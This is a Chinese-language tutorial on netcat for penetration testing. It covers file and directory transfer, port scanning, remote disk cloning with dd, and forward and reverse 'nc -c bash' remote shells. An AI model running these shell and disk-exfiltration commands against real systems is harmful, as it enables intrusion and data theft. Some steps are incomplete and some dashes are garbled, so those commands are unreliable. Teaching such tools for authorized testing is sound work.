渗透测试基本工具：netcat——nc

NETCAT功能总结：

1. nc可以完成所有Telnet可以完成的工作
2. 传输文本信息
3. 传输文件/目录
4. 加密传输文件
5. 远程控制/木马
6. 加密所有流量
7. 流媒体服务器
8. 远程克隆硬盘

具体操作：

NC——TELNET

nc -vn [ip] [port]

nc通信，取证：

用kali2号监听4399端口

用kali1号连接2号的4399端口：

一号机简单取证发送给2号：

2号接收：

文件传输：

1号接收文件：

nc -lp 4399 > ok.txt

2号传输文件：

nc -vn 192.168.2.126 4399 < ok.txt -q 1

 

传输目录：

打包目录->传输文件

A：tar -cvf - music/ | nc -lp 333 –q 1

B：nc -nv 1.1.1.1 333 | tar -xvf –

 

加密传输:
 

A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

 

nc端口扫描：

默认情况下使用TCP探测

nc -nvz 192.168.9.211 1-65535

NC——远程克隆硬盘

A： nc -lp 333 | dd of=/dev/sda
B： dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

NC——远程控制

正向：
A：nc -lp 333 -c bash
B：nc 1.1.1.1 333
反向：
A：nc -lp 333
B：nc 1.1.1.1 333 -c bash